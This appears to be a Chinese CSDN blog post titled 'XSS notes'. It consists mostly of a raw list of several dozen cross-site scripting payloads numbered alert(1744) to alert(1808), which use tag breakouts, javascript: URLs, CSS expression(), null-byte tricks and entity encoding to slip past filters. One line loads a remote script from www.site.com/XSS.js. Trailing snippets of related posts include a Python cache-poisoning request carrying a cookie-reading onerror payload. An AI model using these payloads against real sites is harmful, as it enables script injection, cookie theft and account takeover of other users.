XSS笔记

已于 2023-11-08 09:54:52 修改
阅读量74 收藏
点赞数
文章标签: xss 网络 网络安全
于 2023-11-08 09:49:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_53515309/article/details/134281840
版权
本文详细列举了多种HTML代码片段,展示了XSS(Cross-SiteScripting)攻击的常见手法,包括利用`<script>`标签、CSS背景、元标签等进行恶意脚本植入,警示开发者注意网站安全防护。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

"><script alert(1744))</script>
'">><script>alert(1745)</script>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(1746);\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(1747);\">
<script>1748 1748 = 1; alert(1748)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert(1749)")}</STYLE>
<?='<SCRIPT>alert(1750)</SCRIPT>'?>
" onfocus=alert(1751) "> <"
<FRAMESET><FRAME SRC=\"javascript:alert(1752);\"></FRAMESET>
<STYLE>li {list-style-image: url(\"javascript:alert(1753)\");}</STYLE><UL><LI>XSS
perl -e 'print \"<SCR\0IPT>alert(1754)</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(1755)>\";' > out
<br size=\"&{alert(1756)}\">
<scrscriptipt>alert(1757)</scrscriptipt>
</script><script>alert(1759)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1760)>
[color=red width=expression(alert(1761))][color]
<BASE HREF="javascript:alert(1762);//">
"></iframe><script>alert(1763)</script>
<body onLoad="while(true) alert(1764);">
'"></title><script>alert(1765)</script>
</textarea>'"><script>alert(1766)</script>
'""><script language="JavaScript"> alert(1767);</script>
</script></script><<<<script><>>>><<<script>alert(1768)</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert(1769);">
'></select><script>alert(1770)</script>
a="get";b="URL";c="javascript:";d="alert(1771);";eval(a+b+c+d);
='><script>alert(1772)</script>
<body background=javascript:'"><script>alert(1773)</script>></body>
">/XaDoS/><script>alert(1774)</script><script src="http://www.site.com/XSS.js"></script>
">/KinG-InFeT.NeT/><script>alert(1775)</script>
!--" /><script>alert(1776);</script>
<script>alert(1777)</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(1778)</script>><marquee><h1>XSS by xss</h1></marquee>
'"></title><script>alert(1779)</script>><marquee><h1>XSS by xss</h1></marquee>
<img """><script>alert(1780)</script><marquee><h1>XSS by xss</h1></marquee>
<script>alert(1781)</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(1782)</script>"><script>alert("XSS by \nxss</h1></marquee>
'"></title><script>alert(1783)</script>><marquee><h1>XSS by xss</h1></marquee>
<iframe src="javascript:alert(1784);"></iframe><marquee><h1>XSS by xss</h1></marquee>
'><SCRIPT>alert(1785))</SCRIPT><img src="" alt='
"><SCRIPT>alert(1786))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(1787))</SCRIPT><img src="" alt=\'
'); alert(1788); var x='
\\'); alert(1789);var x=\'
//--></SCRIPT><SCRIPT>alert(1790));
>"><ScRiPt%20%0a%0d>alert(1791)%3B</ScRiPt>
<SCRIPT> alert(1792); </SCRIPT>
<BODY ONLOAD=alert(1793)>
<BODY BACKGROUND="javascript:alert(1794)">
<IMG SRC="javascript:alert(1795);">
<IMG DYNSRC="javascript:alert(1796)">
<IMG LOWSRC="javascript:alert(1797)">
<INPUT TYPE="IMAGE" SRC="javascript:alert(1798);">
<LINK REL="stylesheet" HREF="javascript:alert(1799);">
<TABLE BACKGROUND="javascript:alert(1800)">
<TD BACKGROUND="javascript:alert(1801)">
<DIV STYLE="background-image: url(javascript:alert(1802))">
<DIV STYLE="width: expression(alert(1803));">
&apos;;alert(1804))//\&apos;;alert(1804))//&quot;;alert(1804))//\&quot;;alert(1804))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(1804))&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;alert(1805)&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;alert(1806))&lt;/SCRIPT&gt;
&lt;BASE HREF=&quot;javascript:alert(1807);//&quot;&gt;
&lt;BGSOUND SRC=&quot;javascript:alert(1808);&quot;&gt;
czqc
关注
xss 笔记
qq_33382118的博客
06-03 139
XSS(Cross-Site Scripting)是一种安全漏洞,攻击者通过注入恶意脚本到网页中,当其他用户访问该页面时,脚本会在其浏览器执行。XSS通常分为三类:存储型(持久化)、反射型(非持久化)和DOM型。
xss笔记
2301_79935671的博客
04-02 1200
XSS被称为跨站脚本攻击(Cross Site Scripting),由于和层叠样式表(Cascading Style Sheets,CSS)重名,改为XSS。主要基于JavaScript语言进行恶意攻击,因为js非常灵活操作html、css、浏览器。
XSS笔记分享
weixin_65386473的博客
01-15 2678
XSS 漏洞介绍 跨站脚本攻击(Cross Site Scripting),恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话 xss漏洞类型: 1.反射型 XSS 反射型XSS又称非持久性XSS,这种攻击往往具有一次性。 攻击者通过邮件等形式将包含XSS代码的链接发送给正常用户,当用户点击时,服务器接...
XSS漏洞学习笔记
Tonight_Fantasy的博客
03-18 920
https://a.com/#test该url的意思是访问a网站页面中id=test的内容,这个id不是get请求的参数,而是网站元素的id。https://a.com:8080/page1 和 https://a.com:8080/page2。https://a.com/page1 和 https://a.com:8080/page2。https://a.com/page1 和 https://asd.a.com/page2。两者协议都为https,域名都为a.com,端口都为8080,所以同源。
XSS笔记(简单了解的)
Fly_Mojito的博客
05-30 1291
XSS笔记
xss笔记总结
Long_gone的博客
10-21 228
普通注入 <script>alert(1)</script> 点击注入 "οnclick="alert(1) 创建链接 <a href="javascript:alert(1)">123</a> 点击创建输入框 <input onclick="alert(1)"> 插入图片 <img src="123" onerror="...
正确地防御XSS 笔记
Yisitelz的博客
08-02 377
如何正确防御XSS,首先需要理清XSS可能出现的场景及其解决方法;至于富文本的处理上也要下功夫;DOM型XSS与其他类型的XSS不同,需要特殊看待。
xss game挑战笔记.pdf
02-11
### XSS Game挑战笔记知识点概述 #### 一、XSS攻击简介 XSS(Cross Site Scripting)即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。攻击者通过在Web页面中注入恶意脚本代码,当用户浏览该页面时,嵌入其中的...
个人笔记-渗透测试-XSS漏洞
weixin_48162696的博客
05-22 695
XSS,反射型,存储型,XSS的检测和利用,XSS的防御方法
XSS学习笔记
Likhaooo的博客
03-27 257
文章目录1. XSS的定义2. XSS的原理3. XSS的攻击方式4. XSS的防御措施5.xss闭合 1. XSS的定义 跨站脚本攻击(Cross Site Scripting),缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 2. XSS的原理 攻击者对含有漏洞的服务器发起XSS攻击(注入JS代码)。 诱使受害者打开受到攻击的服务器URL。 受害者在Web浏览器中打开URL,恶意脚本执行。 3
pikachu靶场通关笔记08 XSS关卡04-DOM型XSS
mooyuan的网络安全博客
05-29 972
本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到XSS风险的真实原因,讲解XSS原理并进行渗透实践,本文为XSS关卡 04-DOM 型XSS的渗透部分。
渗透实战PortSwigger Labs AngularJS DOM XSS利用详解
ericalezl的博客
06-02 311
本Lab学习到关于AngularJS的 xss 漏洞利用直接输入回显页面,但是把<>进了 html 编码了当我们输入{{1+1}},没有当作字符处理,而是执行了{{}}是多种前端框架(如 Vue、Angular、Django 模板等)中常见的模板插值语法,主要用于将数据动态绑定到视图,双花括号{{1+1}}包裹的表达式会执行运算。测试,因为存在沙箱机制过滤了危险字符这里用到新的绕过方法下面分析为什么这样可以执行alert()创建 AngularJS 代码</</</</
pikachu靶场通关笔记09 XSS关卡05-DOM型XSS-X
mooyuan的网络安全博客
06-02 524
本系列为通过《pikachu靶场通关笔记》的XSS攻击关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到真实原因,讲解XSS原理并进行渗透实践,本文为XSS关卡05-DOM-X型XSS的渗透部分,并对比04关DOM型XSS,从源码分析和原理对比两者的区别。
pikachu靶场通关笔记07 XSS关卡03-存储型XSS
mooyuan的网络安全博客
05-29 850
本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到XSS风险的真实原因,讲解XSS的原理并进行渗透实践,本文为XSS关卡03-存储型XSS的渗透部分。
分析XSSstrike源码
2201_75445650的博客
05-31 1124
理解XSSstrike运作原理,学习其中的技术模块功能说明是否有独立文件/目录智能 Payload 生成器根据上下文动态构造有效 Payload,而非使用固定词典HTML/JS 解析器手工编写的解析器,能理解上下文下可能包含Fuzzing 引擎自动注入参数 + 分析响应 + 变异构造爬虫引擎多线程爬虫(基于 Photon)参数发现工具自动挖掘 URL 参数(可能集成 Arjun)WAF 探测与绕过检测是否被 WAF 拦截并尝试绕过DOM XSS 扫描。
XSS跨站脚本攻击
m0_63779088的博客
05-30 839
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过在目标网站注入恶意脚本,使其在其他用户浏览器中执行。XSS分为三种类型:存储型(恶意脚本存储在服务器)、反射型(通过URL参数触发)和DOM型(纯客户端攻击)。攻击危害包括窃取敏感信息、会话劫持、伪造用户行为等。防范措施包括输入验证、输出编码、内容安全策略(CSP)、避免动态插入HTML、使用安全框架以及定期安全测试。开发者需综合运用这些技术,才能有效防护XSS攻击,保障网站和用户安全。
pikachu靶场通关笔记10 XSS关卡06-XSS之盲打
最新发布
mooyuan的网络安全博客
06-02 688
本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到真实原因,讲解XSS的原理并进行渗透实践,本文为XSS第06关-XSS盲打的渗透部分,并且结合源码分析,对比通用的XSS攻击讲解攻击成因。
【CVE-2025-4123】Grafana完整分析SSRF和从xss到帐户接管
weixin_47075747的博客
06-02 109
Grafana是一个开源分析平台,主要由Go和TypeScript构建,用于可视化来自Prometheus和InfluxDB等来源的数据。我认为在这个Web应用程序中发现漏洞将是一个很好的挑战,所以我下载了源代码并开始调试——尽管这是我第一次使用Go。我决定专注于应用程序的未经认证的部分。开放重定向本身不会产生任何严重的安全影响,因此我需要将其与另一个功能连接起来。Grafana有一个名为/render的端点,用于根据提供的路径生成图像。
xss-labs笔记
04-01
### XSS-Labs学习笔记与解决方案 #### 关于XSS-Labs的理解 XSS-Labs 是一种用于练习跨站脚本攻击(Cross-Site Scripting, XSS)技巧的在线平台。它提供了多个难度等级的挑战,帮助用户了解并掌握如何绕过常见的安全防护措施。通过这些实验,可以深入理解 XSS 的工作原理以及防御方法。 #### 绕过检测机制的方法 在某些情况下,传统的 XSS 攻击载荷可能被现代 Web 应用程序中的过滤器阻止。为了成功执行 XSS 攻击,需要采用更复杂的策略来规避这些保护机制。例如,在 Level 5 中,`onclick` 和 `script` 被过滤掉的情况下,可以通过其他 HTML 属性实现类似的交互效果[^3]。 下面是一个具体的例子: ```html <a href="javascript:alert('XSS')">Click Me</a> ``` 此代码片段创建了一个超链接按钮,当用户点击时会弹出提示框显示字符串 'XSS'。这种方法不依赖于显式的 `<script>` 标签或者事件处理器属性如 `onclick`,因此有可能避开简单的正则表达式过滤规则。 #### 缓存投毒技术的应用 除了直接针对用户的浏览器发起 XSS 攻击外,还可以利用服务器端存在的漏洞实施更大范围的影响——即所谓的 **Web Cache Poisoning** (WCP)[^2]。在这种类型的攻击里,攻击者诱导目标网站将其恶意构造的内容存储到公共代理缓存之中;之后访问同一资源的所有人都会被返回含有该有害数据版本页面。 要达成这样的目的,通常需要找到那些未正确验证请求参数值的服务端逻辑缺陷,并结合 URL 查询串或其他可变因素制造差异性的响应内容供后续抓取入库之用。 以下是模拟一次基本操作过程的一个简化版 Python 脚本样例: ```python import requests url = "http://example.com/vulnerable-page" params = {'search': '<img src=x onerror=alert(document.cookie)>', 'other_param': 'value'} headers = {"User-Agent": "<script>alert('CachePoison')</script>"} response = requests.get(url, params=params, headers=headers) if response.status_code == 200: print("Request sent successfully.") else: print(f"Failed with status code {response.status_code}.") ``` 上述代码试图向指定网址发送 GET 请求的同时附加特殊设计过的查询条件和自定义头部字段,期望能够影响最终呈现给客户端的结果集从而完成整个流程链路闭环。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值